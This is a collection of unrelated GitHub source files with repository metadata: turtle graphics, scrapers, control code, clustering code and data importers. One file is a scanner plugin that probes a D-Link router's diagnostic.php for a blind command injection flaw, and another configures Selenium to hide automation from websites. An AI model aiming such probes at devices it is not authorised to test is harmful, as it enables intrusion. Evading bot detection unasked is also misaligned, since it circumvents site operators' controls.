vel_next = dt/mass*(force - damping*vel_cur) + vel_cur
print('force = ', force, ' (N) and linear velocity=', vel_cur, 'm/s', 'and next velocity=', vel_next, 'm/s')
# set the linear (forward/backward) velocity command
vel_cmd.linear.x = vel_next
cmd_pub.publish(vel_cmd)
# update the pose for next iteration
pos_prev = pos_cur
key_released = True # assume the key is not pressed unless we receive a new command which proves otherwise
# wait for 0.1 seconds until the next loop and repeat
loop_rate.sleep()
|
hsaeidi-uncw/robot_filtering_lectures
|
scripts/turtle_inertia.py
|
turtle_inertia.py
|
py
| 2,203 |
python
|
en
|
code
| 0 |
github-code
|
6
|
74658796346
|
import sys
import turtle
import numpy as np
import random
from . import lsystem
def deviate(value, dev):
return value * (2 ** np.random.normal(dev[0], dev[1])) + dev[2] + random.uniform(-dev[3], +dev[3])
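# deviate sketch: the nominal value is jittered multiplicatively by 2**N(mu, sigma) and
# additively by a fixed offset plus a uniform term, with dev = (mu, sigma, offset, spread).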
#def draw_leaf(t):
def turtle_interprate(symbols, distance=5, angle=45, init_pos=(0,0), speed=0, pen_color='white', bg_color='black', mode='instant', print_progress=False, distance_dev=(0,0,0,0), angle_dev=(0,0,0,0)):
window = turtle.Screen()
window.bgcolor(bg_color)
if print_progress:
symbols_len = len(symbols)
    if mode == 'instant':
        turtle.tracer(0, 0)  # disable animation so the drawing only appears on turtle.update()
stack = []
t = turtle.Turtle()
t.speed(speed)
t.setheading(90)
t.up()
t.goto(init_pos)
t.pencolor(pen_color)
for i, symbol in enumerate(symbols):
if symbol.char == 'F':
t.down()
if (symbol.parameters):
t.forward(deviate(symbol.parameters[0], distance_dev))
else:
t.forward(deviate(distance, distance_dev))
elif symbol.char == 'T':
t.down()
if (symbol.parameters):
t.pensize(symbol.parameters[1])
t.forward(deviate(symbol.parameters[0], distance_dev))
else:
t.forward(deviate(distance, distance_dev))
elif symbol.char == 'f':
t.up()
if (symbol.parameters):
t.forward(deviate(symbol.parameters[0], distance_dev))
else:
t.forward(deviate(distance, distance_dev))
elif symbol.char == '+':
if (symbol.parameters):
t.left(deviate(symbol.parameters[0], angle_dev))
else:
t.left(deviate(angle, angle_dev))
elif symbol.char == '-':
if (symbol.parameters):
t.right(deviate(symbol.parameters[0], angle_dev))
else:
t.right(deviate(angle, angle_dev))
elif symbol.char == '[':
stack.append([t.pos(), t.heading()])
elif symbol.char == ']':
t.hideturtle()
t.up()
pos, heading = stack.pop()
t.goto(pos)
t.setheading(heading)
elif symbol.char == '!' and symbol.parameters:
t.pensize(symbol.parameters[0])
if print_progress:
sys.stdout.write('\r' + 'Progress : ' + str(round((i/symbols_len)*100)) + '%')
t.hideturtle()
while True:
if mode == 'instant':
turtle.update()
|
valentinlageard/lindertree
|
lindertree/turtle_interprate.py
|
turtle_interprate.py
|
py
| 2,087 |
python
|
en
|
code
| 1 |
github-code
|
6
|
17430789952
|
#!/usr/bin/python
# https://www.udemy.com/course/complete-python-developer-zero-to-mastery/
# 246. Hacker News Project
# https://www.synerzip.com/blog/web-scraping-introduction-applications-and-best-practices/
# https://www.crummy.com/software/BeautifulSoup/
# https://www.crummy.com/software/BeautifulSoup/bs4/doc/
# https://scrapy.org/
# https://developer.mozilla.org/en-US/docs/Learn/CSS/Building_blocks/Selectors
# https://www.w3schools.com/css/css_selectors.asp
# https://www.w3schools.com/cssref/css_selectors.asp
# https://docs.python.org/3/library/pprint.html
# pip install beautifulsoup4
# pip install requests
from bs4 import BeautifulSoup
import requests
import pprint
RES= 'https://news.ycombinator.com/news'
POINTS = 200
res = requests.get(RES)
soup = BeautifulSoup(res.text, 'html.parser')
links = soup.select('.storylink')
subtext = soup.select('.subtext')
for i in range(2,4):
res = requests.get(RES+'?p='+str(i))
soup = BeautifulSoup(res.text, 'html.parser')
links += soup.select('.storylink')
subtext += soup.select('.subtext')
def sort_stories_by_votes(hnlist):
return sorted(hnlist, key=lambda k:k['points'], reverse=True)
def create_custom_hn(links, subtext):
hn = []
for idx, item in enumerate(links):
title= item.getText()
href=item.get('href', None)
vote=subtext[idx].select('.score')
if len(vote):
points=int(vote[0].getText().replace(' points', ''))
if points >= POINTS:
hn.append({'title':title, 'link':href, 'points':points})
return sort_stories_by_votes(hn)
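# Output sketch: each entry looks like {'title': '...', 'link': 'https://...', 'points': 250};
# only stories with at least POINTS votes are kept, sorted by points in descending order.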
hacker_news= create_custom_hn(links, subtext)
pprint.pprint(hacker_news)
|
olexandrch/UdemyCompletePythonDeveloper
|
Sec.18 246 Hacker News Project.py
|
Sec.18 246 Hacker News Project.py
|
py
| 1,683 |
python
|
en
|
code
| 0 |
github-code
|
6
|
37431499468
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: Dlink DIAGNOSTIC.PHP command execution
referer: https://www.exploit-db.com/exploits/24956
author: Lucifer
description: Some D-Link Routers are vulnerable to OS Command injection in the web interface.
On DIR-645 versions prior 1.03 authentication isn't needed to exploit it. On version 1.03 authentication is needed in order to trigger the vulnerability,
which has been fixed definitely on version 1.04. Other D-Link products, like DIR-300 rev B and DIR-600, are also affected by this vulnerability.
Not every device includes wget which we need for deploying our payload. On such devices you could use the cmd generic payload and try to start telnetd or execute other commands.
Since it is a blind OS command injection vulnerability, there is no output for the executed command when using the cmd generic payload. A ping command against a controlled system could be used for testing purposes.
This module has been tested successfully on DIR-645 prior to 1.03, where authentication isn't needed in order to exploit the vulnerability.
'''
import sys
import json
import requests
class router_dlink_command_exec_BaseVerify():
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
}
post_data = {
"act":"ping",
"dst":"www.baidu.com"
}
payload = "/diagnostic.php"
vulnurl = self.url + payload
try:
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if r"<report>OK" in req.text:
return "[+]存在Dlink DIAGNOSTIC.PHP命令执行漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4)
else:
return "[-]no vuln"
except:
return "[-] ======>连接超时"
if __name__ == "__main__":
testVuln = router_dlink_command_exec_BaseVerify(sys.argv[1])
testVuln.run()
|
iceyhexman/onlinetools
|
scanner/plugins/hardware/router/router_dlink_command_exec.py
|
router_dlink_command_exec.py
|
py
| 2,122 |
python
|
en
|
code
| 1,626 |
github-code
|
6
|
3200652220
|
import rodMassParam as P
import loopshape_rodMass as L
import numpy as np
class controllerLoop:
def __init__(self):
self.A_C = L.Css.A
self.B_C = L.Css.B
self.C_C = L.Css.C
self.D_C = L.Css.D
self.A_F = L.Fss.A
self.B_F = L.Fss.B
self.C_F = L.Fss.C
self.D_F = L.Fss.D
n = self.A_C.shape[0]
self.x_C = np.zeros((n, 1))
n = self.A_F.shape[0]
self.x_F = np.zeros((n, 1))
self.limit = P.tau_max
self.tau_eq = P.tau_eq
self.Ts = P.Ts
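    # Integration sketch: update() advances both the prefilter F and the controller C
    # state-space models with N explicit Euler sub-steps per sample,
    # x <- x + (Ts/N) * (A @ x + B * u), approximating the continuous-time dynamics.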
def update(self, theta_r, y):
theta = y.item(0)
#prefilter the reference command
# solve differential equation defining prefilter
if self.x_F.shape[0] == 0:
theta_c_filtered = self.D_F * theta_r
else:
N = 10 # number of Euler integration steps
for i in range(0, N):
self.x_F = self.x_F + self.Ts / N * \
(self.A_F @ self.x_F + self.B_F @ np.array([theta_r]))
# output equation for the prefilter
theta_c_filtered = self.C_F * self.x_F + self.D_F * theta_r
# error signal
error = theta_c_filtered - theta
# solve differential equation defining controller
N = 10 #number of Euler integration steps
for i in range(0, N):
self.x_C = self.x_C + self.Ts / N * \
(self.A_C @ self.x_C + self.B_C * error )
# output equation for the controller
tau_tilde = self.C_C @ self.x_C + self.D_C * error
# compute total torque
# tau = self.saturate(self.tau_eq + tau_tilde)
tau = self.tau_eq + tau_tilde
return tau.item(0)
|
mebach/me431
|
homework_template_folders/homework_template_folders/practice_final/python/controllerLoop.py
|
controllerLoop.py
|
py
| 1,736 |
python
|
en
|
code
| 0 |
github-code
|
6
|
42095434916
|
from selenium import webdriver  # selenium driver
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.chrome.options import Options
from selenium_stealth import stealth  # helps keep websites from detecting that we are a bot
from shutil import which
def iniciar_webdriver(headless=True):  # starts a Chrome webdriver and returns it
    options = Options()
    if headless:
        options.add_argument("--headless")  # run chromedriver without opening a window
    options.add_argument("--window-size=1000,1000")  # set the window width and height
    options.add_argument("--start-maximized")  # maximize the window
    options.add_argument("--disable-dev-shm-usage")  # important on Heroku | use a temporary directory for anonymous shared-memory files
    options.add_argument("--disable-blink-features=AutomationControlled")  # so navigator.webdriver reports false
    options.add_argument("--log-level=3")  # keep the terminal output quiet
    lista = [
        "enable-automation",  # hides "Chrome is being controlled by automated test software"
        "enable-logging",  # hides the DevTools message
    ]
    options.add_experimental_option("excludeSwitches", lista)
    s = Service(which("chromedriver"))
    driver = webdriver.Chrome(service=s, options=options)  # pass in the Options argument
stealth(
driver,
languages=["es-ES", "es"],
vendor="Google Inc.",
platform="Win32",
webgl_vendor="Intel Inc.",
renderer="Intel Iris OpenGL Engine",
fix_hairline=True,)
return driver
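# Usage sketch (assumed flow):
#   driver = iniciar_webdriver(headless=True)
#   driver.get("https://example.com")
#   driver.quit()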
|
Jonnathan1093/Telegram-Chatbot
|
ChatHeroku/iniciar_Webdriver.py
|
iniciar_Webdriver.py
|
py
| 1,666 |
python
|
es
|
code
| 0 |
github-code
|
6
|
15200494736
|
#!/usr/bin/env python
from numpy import array
from math import sqrt
from pyspark import SparkContext
# from pyspark.mllib.clustering import KMeans, KMeansModel
from pyspark.mllib.clustering import KMeans
sc = SparkContext(appName="Kmeans Pyspark")
# Load and parse the data
data = sc.textFile("hdfs://localhost:9000/features/w2v/value_only")
parsedData = data.map(lambda line: array([float(x) for x in line.strip(' ').split(' ')]))
# Build the model (cluster the data)
clusters = KMeans.train(parsedData, 2, maxIterations=10, initializationMode="random")
# Evaluate clustering by computing Within Set Sum of Squared Errors
def error(point):
center = clusters.centers[clusters.predict(point)]
return sqrt(sum([x**2 for x in (point - center)]))
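# Note (sketch): error() returns the Euclidean distance (not its square) from a point to
# its nearest center, so the reduce below sums distances even though the variable is
# named WSSSE.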
WSSSE = parsedData.map(lambda point: error(point)).reduce(lambda x, y: x + y)
print("Within Set Sum of Squared Error = " + str(WSSSE))
# Save and load model
clusters.save(sc, "hdfs://localhost:9000/kmeans/model")
# sameModel = KMeansModel.load(sc, "target/org/apache/spark/PythonKMeansExample/KMeansModel")
|
sindongboy/topinion
|
python/lda.py
|
lda.py
|
py
| 1,071 |
python
|
en
|
code
| 0 |
github-code
|
6
|
21433461529
|
import csv
import logging
import os
logger = logging.getLogger("app_logger")
# Channels with extra long videos messing up the stats and to be deleted,
# or other channels you just don't want to include.
CHANNELS_NOT_TO_IMPORT = ["4k SCREENSAVERS", "Nature Relaxation Films", "4K Relaxation Channel"]
# Some extra long videos can be deleted but in that case these channels won't be touched.
IMPORTANT_CHANNELS = ["Lex Fridman", "Andrew Huberman"]
# Insert the data from the CSV file into the database.
def insert_data_into_database(conn, c):
csv_file = os.path.abspath(os.getenv("CSV_FILE"))
with open(csv_file, "r", encoding="UTF-8-sig") as csvfile:
reader = csv.DictReader(csvfile, delimiter=";")
inserted_videos = 0
inserted_channels = 0
inserted_actions = 0
skipped_videos = 0
logger.info("Inserting data into the database...")
# Loop over each row in the CSV file.
for row in reader:
if row["Channel"] in CHANNELS_NOT_TO_IMPORT:
skipped_videos += 1
continue
c.execute("SELECT id FROM activity WHERE action = ? AND timestamp = ?",
(row["Action"], row["Timestamp"]))
activity = c.fetchone()
# If the action is already in the activity table, this is not the first time the script is run.
if activity:
continue
c.execute("SELECT id, url FROM channel WHERE url = ?", (row["Channel URL"],))
channel = c.fetchone()
# If the channel doesn"t exist, insert it into the channels table.
if not channel:
channel_name = row["Channel"].strip()
c.execute("""INSERT INTO channel (name, url)
VALUES (?, ?)""", (channel_name , row["Channel URL"],))
channel_id = c.lastrowid
inserted_channels += 1
else:
channel_id = channel[0]
if "Title" in row and "URL" in row:
c.execute("SELECT id FROM video WHERE title = ? AND url = ?", (row["Title"], row["URL"]))
video = c.fetchone()
# If the video doesn"t exist, insert it into the videos table.
if not video:
c.execute("""INSERT INTO video (title, url, channel_id)
VALUES (?, ?, ?)""", (row.get("Title", None), row["URL"], channel_id))
video_id = c.lastrowid
inserted_videos += 1
else:
video_id = video[0]
c.execute("""INSERT INTO activity (action, timestamp, video_id, channel_id)
VALUES (?, ?, ?, ?)""", (row["Action"], row["Timestamp"], video_id, channel_id))
inserted_actions += 1
conn.commit()
logger.info(f"Actions inserted: {inserted_actions}")
logger.info(f"Unique videos inserted: {inserted_videos}")
logger.info(f"Unique channels inserted: {inserted_channels}")
if skipped_videos > 0:
logger.info(f"{skipped_videos} videos skipped because channels were defined as excluded")
# Many streams are 10+ hours which mess up the watch time stats. 4 hours seemed to be a good average for me.
def delete_extra_long_videos(conn, c, max_length=4):
min_length = max_length * 3600
excluded_condition = ''
if IMPORTANT_CHANNELS:
excluded_condition = f"AND channel.name NOT IN ({','.join('?' for _ in IMPORTANT_CHANNELS)})"
else:
excluded_condition = ''
query = f"""
DELETE FROM video
WHERE id IN (
SELECT video.id
FROM video
JOIN channel ON video.channel_id = channel.id
WHERE video.length > ?
{excluded_condition}
ORDER BY video.length DESC)
"""
c.execute(query, [min_length] + IMPORTANT_CHANNELS)
conn.commit()
if c.rowcount > 0:
logger.info(f"Deleted {c.rowcount} extra long videos.")
# Delete channels that have no videos and vice versa.
def delete_orphans(conn, c):
c.execute("DELETE FROM channel WHERE id NOT IN (SELECT DISTINCT channel_id FROM video)")
rowcount = c.rowcount
c.execute("DELETE FROM activity WHERE channel_id NOT IN (SELECT id FROM channel)")
c.execute("DELETE FROM video WHERE channel_id NOT IN (SELECT id FROM channel)")
c.execute("DELETE FROM video_stat WHERE video_id NOT IN (SELECT id FROM video)")
c.execute("DELETE FROM channel_stat WHERE channel_id NOT IN (SELECT id FROM channel)")
conn.commit()
if rowcount > 0:
logger.info(f"Deleted {c.rowcount} empty channels.")
|
arilaakso/viewinginsights
|
import_data_into_db.py
|
import_data_into_db.py
|
py
| 4,855 |
python
|
en
|
code
| 0 |
github-code
|
6
|
20519700810
|
"""!
@brief Cluster analysis algorithm: X-Means
@details Implementation based on papers @cite article::xmeans::1, @cite article::xmeans::mndl
@authors Andrei Novikov ([email protected])
@date 2014-2020
@copyright BSD-3-Clause
"""
import copy
import numpy
from enum import IntEnum
from math import log
from pyclustering.cluster.encoder import type_encoding
from pyclustering.cluster.kmeans import kmeans
from pyclustering.cluster.center_initializer import kmeans_plusplus_initializer
from pyclustering.core.metric_wrapper import metric_wrapper
from pyclustering.core.wrapper import ccore_library
import pyclustering.core.xmeans_wrapper as wrapper
from pyclustering.utils import distance_metric, type_metric
class splitting_type(IntEnum):
"""!
@brief Enumeration of splitting types that can be used as splitting creation of cluster in X-Means algorithm.
"""
## Bayesian information criterion (BIC) to approximate the correct number of clusters.
## Kass's formula is used to calculate BIC:
## \f[BIC(\theta) = L(D) - \frac{1}{2}pln(N)\f]
##
## The number of free parameters \f$p\f$ is simply the sum of \f$K - 1\f$ class probabilities, \f$MK\f$ centroid coordinates, and one variance estimate:
## \f[p = (K - 1) + MK + 1\f]
##
## The log-likelihood of the data:
## \f[L(D) = n_jln(n_j) - n_jln(N) - \frac{n_j}{2}ln(2\pi) - \frac{n_jd}{2}ln(\hat{\sigma}^2) - \frac{n_j - K}{2}\f]
##
## The maximum likelihood estimate (MLE) for the variance:
## \f[\hat{\sigma}^2 = \frac{1}{N - K}\sum\limits_{j}\sum\limits_{i}||x_{ij} - \hat{C}_j||^2\f]
BAYESIAN_INFORMATION_CRITERION = 0
## Minimum noiseless description length (MNDL) to approximate the correct number of clusters @cite article::xmeans::mndl.
## Beheshti's formula is used to calculate upper bound:
## \f[Z = \frac{\sigma^2 \sqrt{2K} }{N}(\sqrt{2K} + \beta) + W - \sigma^2 + \frac{2\alpha\sigma}{\sqrt{N}}\sqrt{\frac{\alpha^2\sigma^2}{N} + W - \left(1 - \frac{K}{N}\right)\frac{\sigma^2}{2}} + \frac{2\alpha^2\sigma^2}{N}\f]
##
## where \f$\alpha\f$ and \f$\beta\f$ represent the parameters for validation probability and confidence probability.
##
## To improve clustering results some contradiction is introduced:
## \f[W = \frac{1}{n_j}\sum\limits_{i}||x_{ij} - \hat{C}_j||\f]
## \f[\hat{\sigma}^2 = \frac{1}{N - K}\sum\limits_{j}\sum\limits_{i}||x_{ij} - \hat{C}_j||\f]
MINIMUM_NOISELESS_DESCRIPTION_LENGTH = 1
class xmeans:
"""!
@brief Class represents clustering algorithm X-Means.
@details X-means clustering method starts with the assumption of having a minimum number of clusters,
and then dynamically increases them. X-means uses specified splitting criterion to control
the process of splitting clusters. Method K-Means++ can be used for calculation of initial centers.
CCORE implementation of the algorithm uses thread pool to parallelize the clustering process.
Here example how to perform cluster analysis using X-Means algorithm:
@code
from pyclustering.cluster import cluster_visualizer
from pyclustering.cluster.xmeans import xmeans
from pyclustering.cluster.center_initializer import kmeans_plusplus_initializer
from pyclustering.utils import read_sample
from pyclustering.samples.definitions import SIMPLE_SAMPLES
# Read sample 'simple3' from file.
sample = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE3)
# Prepare initial centers - amount of initial centers defines amount of clusters from which X-Means will
# start analysis.
amount_initial_centers = 2
initial_centers = kmeans_plusplus_initializer(sample, amount_initial_centers).initialize()
# Create instance of X-Means algorithm. The algorithm will start analysis from 2 clusters, the maximum
# number of clusters that can be allocated is 20.
xmeans_instance = xmeans(sample, initial_centers, 20)
xmeans_instance.process()
# Extract clustering results: clusters and their centers
clusters = xmeans_instance.get_clusters()
centers = xmeans_instance.get_centers()
# Print total sum of metric errors
print("Total WCE:", xmeans_instance.get_total_wce())
# Visualize clustering results
visualizer = cluster_visualizer()
visualizer.append_clusters(clusters, sample)
visualizer.append_cluster(centers, None, marker='*', markersize=10)
visualizer.show()
@endcode
Visualization of clustering results that were obtained using code above and where X-Means algorithm allocates four clusters.
@image html xmeans_clustering_simple3.png "Fig. 1. X-Means clustering results (data 'Simple3')."
By default X-Means clustering algorithm uses Bayesian Information Criterion (BIC) to approximate the correct number
of clusters. There is an example where another criterion Minimum Noiseless Description Length (MNDL) is used in order
to find optimal amount of clusters:
@code
from pyclustering.cluster import cluster_visualizer
from pyclustering.cluster.xmeans import xmeans, splitting_type
from pyclustering.cluster.center_initializer import kmeans_plusplus_initializer
from pyclustering.utils import read_sample
from pyclustering.samples.definitions import FCPS_SAMPLES
# Read sample 'Target'.
sample = read_sample(FCPS_SAMPLES.SAMPLE_TARGET)
# Prepare initial centers - amount of initial centers defines amount of clusters from which X-Means will start analysis.
random_seed = 1000
amount_initial_centers = 3
initial_centers = kmeans_plusplus_initializer(sample, amount_initial_centers, random_state=random_seed).initialize()
# Create instance of X-Means algorithm with MNDL splitting criterion.
xmeans_mndl = xmeans(sample, initial_centers, 20, splitting_type=splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, random_state=random_seed)
xmeans_mndl.process()
# Extract X-Means MNDL clustering results.
mndl_clusters = xmeans_mndl.get_clusters()
# Visualize clustering results.
visualizer = cluster_visualizer(titles=['X-Means with MNDL criterion'])
visualizer.append_clusters(mndl_clusters, sample)
visualizer.show()
@endcode
@image html xmeans_clustering_mndl_target.png "Fig. 2. X-Means MNDL clustering results (data 'Target')."
    As in many other algorithms, it is possible to specify the metric that should be used for cluster analysis, for
    example, the Chebyshev distance metric:
@code
# Create instance of X-Means algorithm with Chebyshev distance metric.
chebyshev_metric = distance_metric(type_metric.CHEBYSHEV)
xmeans_instance = xmeans(sample, initial_centers, max_clusters_amount, metric=chebyshev_metric).process()
@endcode
@see center_initializer
"""
def __init__(self, data, initial_centers=None, kmax=20, tolerance=0.001, criterion=splitting_type.BAYESIAN_INFORMATION_CRITERION, ccore=True, **kwargs):
"""!
@brief Constructor of clustering algorithm X-Means.
@param[in] data (array_like): Input data that is presented as list of points (objects), each point should be represented by list or tuple.
@param[in] initial_centers (list): Initial coordinates of centers of clusters that are represented by list: `[center1, center2, ...]`,
if it is not specified then X-Means starts from the random center.
@param[in] kmax (uint): Maximum number of clusters that can be allocated.
        @param[in] tolerance (double): Stop condition for each iteration: if the maximum change of the cluster centers is less than the tolerance, then the algorithm stops processing.
        @param[in] criterion (splitting_type): Type of splitting criterion (by default `splitting_type.BAYESIAN_INFORMATION_CRITERION`).
@param[in] ccore (bool): Defines if C++ pyclustering library should be used instead of Python implementation.
@param[in] **kwargs: Arbitrary keyword arguments (available arguments: `repeat`, `random_state`, `metric`, `alpha`, `beta`).
<b>Keyword Args:</b><br>
            - repeat (uint): How many times K-Means should be run to improve parameters (by default `1`).
               Larger `repeat` values increase the probability of finding the global optimum.
            - random_state (int): Seed for the random state (by default `None`; the current system time is used).
- metric (distance_metric): Metric that is used for distance calculation between two points (by default
euclidean square distance).
            - alpha (double): Parameter in the range [0.0, 1.0] for the alpha probabilistic bound \f$Q\left(\alpha\right)\f$.
               The parameter is used only in case of the MNDL splitting criterion; in all other cases this value is ignored.
            - beta (double): Parameter in the range [0.0, 1.0] for the beta probabilistic bound \f$Q\left(\beta\right)\f$.
               The parameter is used only in case of the MNDL splitting criterion; in all other cases this value is ignored.
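        A hedged usage sketch (illustrative values only; `sample` and `initial_centers` are assumed
        to be prepared as in the class-level examples above):
        @code
            xmeans_instance = xmeans(sample, initial_centers, kmax=20,
                                     criterion=splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH,
                                     repeat=5, random_state=1000, alpha=0.9, beta=0.9)
        @endcode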
"""
self.__pointer_data = numpy.array(data)
self.__clusters = []
self.__random_state = kwargs.get('random_state', None)
self.__metric = copy.copy(kwargs.get('metric', distance_metric(type_metric.EUCLIDEAN_SQUARE)))
if initial_centers is not None:
self.__centers = numpy.array(initial_centers)
else:
self.__centers = kmeans_plusplus_initializer(data, 2, random_state=self.__random_state).initialize()
self.__kmax = kmax
self.__tolerance = tolerance
self.__criterion = criterion
self.__total_wce = 0.0
self.__repeat = kwargs.get('repeat', 1)
self.__alpha = kwargs.get('alpha', 0.9)
self.__beta = kwargs.get('beta', 0.9)
self.__ccore = ccore and self.__metric.get_type() != type_metric.USER_DEFINED
if self.__ccore is True:
self.__ccore = ccore_library.workable()
self.__verify_arguments()
def process(self):
"""!
@brief Performs cluster analysis in line with rules of X-Means algorithm.
@return (xmeans) Returns itself (X-Means instance).
@see get_clusters()
@see get_centers()
"""
if self.__ccore is True:
self.__process_by_ccore()
else:
self.__process_by_python()
return self
def __process_by_ccore(self):
"""!
@brief Performs cluster analysis using CCORE (C/C++ part of pyclustering library).
"""
ccore_metric = metric_wrapper.create_instance(self.__metric)
result = wrapper.xmeans(self.__pointer_data, self.__centers, self.__kmax, self.__tolerance, self.__criterion,
self.__alpha, self.__beta, self.__repeat, self.__random_state,
ccore_metric.get_pointer())
self.__clusters = result[0]
self.__centers = result[1]
self.__total_wce = result[2][0]
def __process_by_python(self):
"""!
@brief Performs cluster analysis using python code.
"""
self.__clusters = []
while len(self.__centers) <= self.__kmax:
current_cluster_number = len(self.__centers)
self.__clusters, self.__centers, _ = self.__improve_parameters(self.__centers)
allocated_centers = self.__improve_structure(self.__clusters, self.__centers)
if current_cluster_number == len(allocated_centers):
break
else:
self.__centers = allocated_centers
self.__clusters, self.__centers, self.__total_wce = self.__improve_parameters(self.__centers)
def predict(self, points):
"""!
@brief Calculates the closest cluster to each point.
@param[in] points (array_like): Points for which closest clusters are calculated.
        @return (list) List of the closest clusters for each point. Each cluster is denoted by its index. Returns an empty
                 collection if the 'process()' method was not called.
        An example of how to calculate (or predict) the closest cluster for specified points:
@code
from pyclustering.cluster.xmeans import xmeans
from pyclustering.samples.definitions import SIMPLE_SAMPLES
from pyclustering.utils import read_sample
# Load list of points for cluster analysis.
sample = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE3)
# Initial centers for sample 'Simple3'.
initial_centers = [[0.2, 0.1], [4.0, 1.0], [2.0, 2.0], [2.3, 3.9]]
# Create instance of X-Means algorithm with prepared centers.
xmeans_instance = xmeans(sample, initial_centers)
# Run cluster analysis.
xmeans_instance.process()
# Calculate the closest cluster to following two points.
points = [[0.25, 0.2], [2.5, 4.0]]
closest_clusters = xmeans_instance.predict(points)
print(closest_clusters)
@endcode
"""
nppoints = numpy.array(points)
if len(self.__clusters) == 0:
return []
self.__metric.enable_numpy_usage()
npcenters = numpy.array(self.__centers)
differences = numpy.zeros((len(nppoints), len(npcenters)))
for index_point in range(len(nppoints)):
differences[index_point] = self.__metric(nppoints[index_point], npcenters)
self.__metric.disable_numpy_usage()
return numpy.argmin(differences, axis=1)
def get_clusters(self):
"""!
@brief Returns list of allocated clusters, each cluster contains indexes of objects in list of data.
@return (list) List of allocated clusters.
@see process()
@see get_centers()
@see get_total_wce()
"""
return self.__clusters
def get_centers(self):
"""!
@brief Returns list of centers for allocated clusters.
@return (list) List of centers for allocated clusters.
@see process()
@see get_clusters()
@see get_total_wce()
"""
return self.__centers
def get_cluster_encoding(self):
"""!
@brief Returns clustering result representation type that indicate how clusters are encoded.
@return (type_encoding) Clustering result representation.
@see get_clusters()
"""
return type_encoding.CLUSTER_INDEX_LIST_SEPARATION
def get_total_wce(self):
"""!
@brief Returns sum of Euclidean Squared metric errors (SSE - Sum of Squared Errors).
@details Sum of metric errors is calculated using distance between point and its center:
        \f[error=\sum_{i=0}^{N}euclidean\_square\_distance(x_{i}, center(x_{i}))\f]
@see process()
@see get_clusters()
"""
return self.__total_wce
def __search_optimial_parameters(self, local_data):
"""!
        @brief Splits data of the region into two clusters and tries to find the global optimum by running k-means clustering
                several times (defined by the 'repeat' argument).
@param[in] local_data (list): Points of a region that should be split into two clusters.
@return (tuple) List of allocated clusters, list of centers and total WCE (clusters, centers, wce).
"""
optimal_wce, optimal_centers, optimal_clusters = float('+inf'), None, None
for _ in range(self.__repeat):
candidates = 5
if len(local_data) < candidates:
candidates = len(local_data)
local_centers = kmeans_plusplus_initializer(local_data, 2, candidates, random_state=self.__random_state).initialize()
kmeans_instance = kmeans(local_data, local_centers, tolerance=self.__tolerance, ccore=False, metric=self.__metric)
kmeans_instance.process()
local_wce = kmeans_instance.get_total_wce()
if local_wce < optimal_wce:
optimal_centers = kmeans_instance.get_centers()
optimal_clusters = kmeans_instance.get_clusters()
optimal_wce = local_wce
return optimal_clusters, optimal_centers, optimal_wce
def __improve_parameters(self, centers, available_indexes=None):
"""!
@brief Performs k-means clustering in the specified region.
        @param[in] centers (list): Cluster centers; if None, two centers are generated automatically using the center initialization method.
        @param[in] available_indexes (list): Indexes that define which points can be used for k-means clustering; if None, all points are used.
@return (tuple) List of allocated clusters, list of centers and total WCE (clusters, centers, wce).
"""
if available_indexes and len(available_indexes) == 1:
index_center = available_indexes[0]
return [available_indexes], self.__pointer_data[index_center], 0.0
local_data = self.__pointer_data
if available_indexes:
local_data = [self.__pointer_data[i] for i in available_indexes]
local_centers = centers
if centers is None:
clusters, local_centers, local_wce = self.__search_optimial_parameters(local_data)
else:
kmeans_instance = kmeans(local_data, local_centers, tolerance=self.__tolerance, ccore=False, metric=self.__metric).process()
local_wce = kmeans_instance.get_total_wce()
local_centers = kmeans_instance.get_centers()
clusters = kmeans_instance.get_clusters()
if available_indexes:
clusters = self.__local_to_global_clusters(clusters, available_indexes)
return clusters, local_centers, local_wce
def __local_to_global_clusters(self, local_clusters, available_indexes):
"""!
        @brief Converts clusters in the local region defined by 'available_indexes' to global clusters.
        @param[in] local_clusters (list): Local clusters in the specific region.
        @param[in] available_indexes (list): Mapping between local and global point indexes.
@return Global clusters.
"""
clusters = []
for local_cluster in local_clusters:
current_cluster = []
for index_point in local_cluster:
current_cluster.append(available_indexes[index_point])
clusters.append(current_cluster)
return clusters
def __improve_structure(self, clusters, centers):
"""!
@brief Check for best structure: divides each cluster into two and checks for best results using splitting criterion.
@param[in] clusters (list): Clusters that have been allocated (each cluster contains indexes of points from data).
@param[in] centers (list): Centers of clusters.
@return (list) Allocated centers for clustering.
"""
allocated_centers = []
amount_free_centers = self.__kmax - len(centers)
for index_cluster in range(len(clusters)):
# solve k-means problem for children where data of parent are used.
(parent_child_clusters, parent_child_centers, _) = self.__improve_parameters(None, clusters[index_cluster])
# If it's possible to split current data
if len(parent_child_clusters) > 1:
# Calculate splitting criterion
parent_scores = self.__splitting_criterion([clusters[index_cluster]], [centers[index_cluster]])
child_scores = self.__splitting_criterion([parent_child_clusters[0], parent_child_clusters[1]], parent_child_centers)
split_require = False
# Reallocate number of centers (clusters) in line with scores
if self.__criterion == splitting_type.BAYESIAN_INFORMATION_CRITERION:
if parent_scores < child_scores:
split_require = True
elif self.__criterion == splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH:
# If its score for the split structure with two children is smaller than that for the parent structure,
# then representing the data samples with two clusters is more accurate in comparison to a single parent cluster.
if parent_scores > child_scores:
split_require = True
if (split_require is True) and (amount_free_centers > 0):
allocated_centers.append(parent_child_centers[0])
allocated_centers.append(parent_child_centers[1])
amount_free_centers -= 1
else:
allocated_centers.append(centers[index_cluster])
else:
allocated_centers.append(centers[index_cluster])
return allocated_centers
def __splitting_criterion(self, clusters, centers):
"""!
@brief Calculates splitting criterion for input clusters.
@param[in] clusters (list): Clusters for which splitting criterion should be calculated.
@param[in] centers (list): Centers of the clusters.
@return (double) Returns splitting criterion. High value of splitting criterion means that current structure is
much better.
@see __bayesian_information_criterion(clusters, centers)
@see __minimum_noiseless_description_length(clusters, centers)
